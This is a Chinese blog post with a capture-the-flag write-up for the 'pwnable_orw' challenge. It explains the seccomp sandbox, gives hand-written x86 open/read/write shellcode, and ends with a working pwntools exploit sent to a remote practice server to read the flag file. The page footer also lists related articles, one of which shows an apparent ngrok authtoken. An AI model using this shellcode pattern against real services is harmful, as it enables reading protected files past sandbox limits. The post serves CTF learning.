pwnable_orw

最新推荐文章于 2023-09-22 13:19:22 发布
最新推荐文章于 2023-09-22 13:19:22 发布
阅读量557 收藏 2
点赞数 2
分类专栏: BUU-PWN 文章标签: pwn 网络安全 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/122117257
版权

pwnable_orw

使用checksec查看:
在这里插入图片描述
开了Canary,但没有开NX,可以考虑写入shellcode执行。

放进IDA中查看:
在这里插入图片描述
调用orw_seccomp函数后,将用户输入的字符串执行。

直接尝试写入shellcode,发现失败,便回过来看orw_seccomp()函数:
在这里插入图片描述
seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandboxing 机制。在 Linux 系统里,大量的系统调用(system call)直接暴露给用户态程序。但是,并不是所有的系统调用都被需要,而且不安全的代码滥用系统调用会对系统造成安全威胁。seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。

seccomp-tools来看下还剩下哪些系统调用可以使用:
在这里插入图片描述
OK 还有orw可以使用。

题目思路:

  • 打开flag文件,sys_open(file,0,0);系统调用号为5

    • push 0x0  			#字符串结尾
push 0x67616c66		#'flags'
mov ebx,esp			
xor ecx,ecx			#0
xor edx,edx			#0
mov eax,0x5			#调用号
int 0x80			#sys_open(flags,0,0)

  • 读flag文件,sys_read(3,file,0x100);系统调用号为3

    • mov eax,0x3; 
mov ecx,ebx;	# ecx = char __user *buf 缓冲区,读出的数据-->也就是读“flag”
mov ebx,0x3;	# 文件描述符 fd:是文件描述符 0 1 2 3 代表标准的输出输入和出错,其他打开的文件
mov edx,0x100;	#对应字节数
int 0x80;

  • 输出flag文件内容,sys_write(1,file,0x30);系统调用号为4

    • mov eax,0x4;	# eax = sys_write
mov ebx,0x1;	# ebx = unsigned int fd = 1
int 0x80;

或者用shellcraft生成shellcode。

exp:

from pwn import *

#start
# r = process("../buu/pwnable_orw")
r = remote('node4.buuoj.cn',26281)
context.log_level = 'debug'

#attack
shellcode = shellcraft.open('flag')
shellcode += shellcraft.read('eax','esp',42)
shellcode += shellcraft.write(1,'esp',42)
payload = asm(shellcode)
r.sendlineafter("shellcode:",payload)
print(r.recv())
# io.interactive()
m0sway
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
pwn入门-buu第二页题解(32道)(持续更新中),一起刷完了这份1307页的网络安全面试宝典吧
m0_61068496的博客
04-06 550
有print(format),格式化字符串漏洞啊.那么有什么用呢?别急接着往下看看到vuln函数可以栈溢出,哎,但是这个v2 = __readfsqword(0x28u)是什么意思呢?
BUUCTF:pwnable_orw
qq_44768749的博客
08-27 1506
BUUCTF:pwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序,开启了canary保护 0x02 运行 提示输入shellcode 0x03 IDA main函数 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是
计算机系统基础第二次作业(1).doc
05-25
计算机系统基础第二次作业 3、对于以下AT&T格式汇编指令,根据操作数的长度确定对应指令助记符中的长度后缀, 并说明每个操作数的寻址方式。 (1)mov 8(%ebp, %ebx, 4), %ax (2)mov %al, 12(%ebp) (3)add ( , %ebx,4), %ebx (4)or (%ebx), %dh (5)push $0xF8 (6)mov $0xFFF0, %eax (7)test %cx, %cx (8)lea 8(%ebx, %esi), %eax 答:如下表所示: "题目编号 "长度后缀 "源操作数 "目的操作数 " "(1) "w "基址+比例变址+位移 "寄存器 " "(2) "b "寄存器 "基址+位移 " "(3) "l "比例变址 "寄存器 " "(4) "b "基址 "寄存器 " "(5) "l "立即数 "栈 " "(6) "l "立即数 "寄存器 " "(7) "w "寄存器 "寄存器 " "(8) "l "基址+变址+位移 "寄存器 " 4. 使用汇编器处理以下各行AT&T格式代码时都会产生错误,请说明每一行存在什么错误。 (1)movl 0xFF, (%eax) (2)movb %ax, 12(%ebp) (3)addl %ecx, $0xF0 (4)orw $0xFFFF0, (%ebx) (5)addb $0xF8, (%dl) (6)movl %bx, %eax (7)andl %esi, %esx (8)movw 8(%ebp, , 4), %ax 答: (1)书写错误。因为源操作数是立即数0xFF,所以需要在前面加上'$' (2)由于源操作数(%ax)是16位,而长度后缀是字节'b',所以不一致,应改为'movw ' (3)目的操作数不能是立即数寻址 (4)操作数位数超过16位,而长度后缀为16位的'w',应改为'orl' (5)不能用8位寄存器作为目的操作数地址所在寄存器 (6)源操作数寄存器与目的操作数寄存器长度不一致 (7)不存在ESX寄存器 (8)源操作数地址中缺少变址寄存器 7. 假设变量x和y分别存放在寄存器EAX和ECX中,请给出以下每条指令执行后寄存器EDX中的 结果。 (1)leal (%eax), %edx (2)leal 4(%eax, %ecx), %edx (3)leal (%eax, %ecx, 8), %edx (4)leal 0xC(%ecx, %eax, 2), %edx (5)leal ( , %eax, 4), %edx (6)leal (%eax, %ecx), %edx 答: (1)R[edx]=x //把eax的值放到edx中去 (2)R[edx]=x+y+4 //把eax+ecx+4的值放到edx中去 (3)R[edx]=x+8*y //把eax+8*ecx的值放到edx中去 (4)R[edx]=y+2*x+12 //把ecx+2*eax+12的值放到edx中去 (5)R[edx]=4*x //把4*eax的值放到edx中去 (6)R[edx]=x+y //把eax+ecx的值放到edx中去 8.假设以下地址以及寄存器中存放的机器数如下表所示 "地址 "机器数 "寄存器 "机器数 " "0x8049300 "0xfffffff0 "EAX "0x8049300 " "0x8049400 "0x80000008 "EBX "0x100 " "0x8049384 "0x80f7ff00 "ECX "0x10 " "0x8049380 "0x908f12a8 "EDX "0x80 " 分别说明执行以下指令或寄存中的内容交发生改变?改变后的内容是什么条件标志OF 、 SF 、 ZF 和 CF 会发生什么改变。 (1)指令功能为:R[edx] R[edx]+M[R[eax]]=0x00000080+M[0x8049300],寄存器EDX中内 容改变。改变后的 内容为以下运算的结果:00000080H+FFFFFFF0H 0000 0000 0000 0000 0000 0000 1000 0000 + 1111 1111 1111 1111 1111 1111 1111 0000 _______________________________________________ 1 0000 0000 0000 0000 0000 0000 0111 0000 因此,EDX中的内容改变为0x00000070。根据表3.5可知,加法指令会影响OF、SF、ZF和 CF标志。OF=0,ZF=0,SF=0,CF=1。 (2)指令功能为:R[ecx] R[ecx]-M[R[eax]+R[ebx]]=0x00000010+M[0x8049400]
【pwnable.tw】orw
qq_61670993的博客
09-22 77
32位orw,很简单没啥好说的。
BUUCTF-pwnable_orw-WP
Rt1Text的博客
02-12 240
32位,canary保护。
[BUUCTF-pwn]——pwnable_orw
半岛铁盒的博客
06-12 1194
记一次ORW的题目 orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 32位程序,开启了canary 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandbox
[BUUCTF]PWN——pwnable_orw
mcmuyanga的博客
11-10 1814
pwnable_orw 附件 步骤: 例行检查,32位程序,开启了canary 本地运行一下程序,看看大概的情况,提示我们输入shellcode 32位ida载入,检索字符串,没看见什么可以直接利用的,直接看main函数 orw_seccomp函数 prctl在百度后知道了是沙盒机制,具体的看这篇文章 prctl seccomp相当于内核中的一种安全机制,正常情况下,程序可以使用所有的syscall,但是当劫持程序流程之后通过exeve来呼叫syscall得到shell时seccomp边
BUUCTF pwnable_orw
weixin_45441024的博客
05-10 359
BUUCTF pwnable_orw 好久不更新博客了,在不更新显得好像自己真的瘦到95斤了似的,上题! 1)还是一如既往地check一下,可以看到程序开启了canary防护,其他的防护并未开启 2)运行一下这个程序,大概了解一下它的运行效果 3)分析这个函数,发现调用了两次prctl,这里决定了程序只能调用open,read,write函数,那我们就必须利用有限的条件来执行,这里有两种写法 ①手动添加汇编代码进行构造 #!/usr/bin/python2 #coding=utf-8 from pwn
计算机系统基础第二次作业.doc
05-25
(1)movl 0xFF, (%eax) (2)movb %ax, 12(%ebp) (3)addl %ecx, $0xF0 (4)orw $0xFFFF0, (%ebx) (5)addb $0xF8, (%dl) (6)movl %bx, %eax (7)andl %esi, %esx (8)movw 8(%ebp, , 4), %ax 答: (1)...
aserteee:我的GitHub个人资料的配置文件
03-22
职位: 作业:Create_Windows_2019_Azure_...脚本: 回声ngrok的authToken “1q6MPXb3oRW5wyDpZkfqLaw2lMh_46EQ4JLUPuaCW3MRrQwGL”> NGROK.bat卷曲-s -O AzureNgrokAutoRegion.bat显示名: '运行RDP哈克在Azure管道'
浅析3G网络安全.pdf
06-08
accord ing tO 3G netw ork dat a securi ty and ident ity auth ent icati on£ th e paper p ut f orw ard the i mpro vement sug gesti ons £ K e) £ w o r d s £" 3G netw or k £» net w or k sec ur it y ...
vagrant-neosdev:TYPO3 Neos 和 Flow 通用开发服务器
05-31
已弃用! 请参阅 (使用 ansible 代替 puppet) MOC TYPO3 Neos and Flow 通用开发服务器 用于在类似于 MOC 托管生产机器的环境中开发 TYPO3 Flow 和 Neos 站点...sudo mount -orw -oresvport -t nfs 192.168.66.80:/
pwnable_orw-seccomp沙箱
个人笔记
04-11 692
但是,并不是所有的系统调用都被需要,而且不安全的代码滥用系统调用会对系统造成安全威胁。seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。还能调用o(open)/r(read)/w(write)功能,题目orw的提示就是这样来的!输出flag文件内容,sys_write(1,file,0x30);手动生成读取文件shellcode。
pwnable.tw---orw
杀生丸?不,其实我要的是桔梗
05-01 1542
pwnable.tw—orw 这题主要考验的是shellcode的自我制作,建议学会Linux Sysycall Reference 再来,或者第一题start彻底搞会。 题目分析: 照例: 就开了栈保护,虽然都没有什么用。 题目开始就是让你输入shellcode。 就用msf随便试了几下,发现有些被过滤了。 调试看看: 发现调用了seccomp,百度了下是一个linu...
buuctf pwnable_orw
qq_42728977的博客
04-12 323
限制条件下的shellcode 参考链接: https://www.cnblogs.com/chrysanthemum/p/12323183.html http://www.chiange.com/pwnable-tw-orw/
return orw();
最新发布
12-19
return orw()是一个函数调用表达式,它会调用名为orw()的函数,并将函数的返回值作为整个表达式的值返回。 在这个表达式中,orw()表示一个被定义的函数。函数调用的一般形式是函数名后跟一对括号,括号中可以包含...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值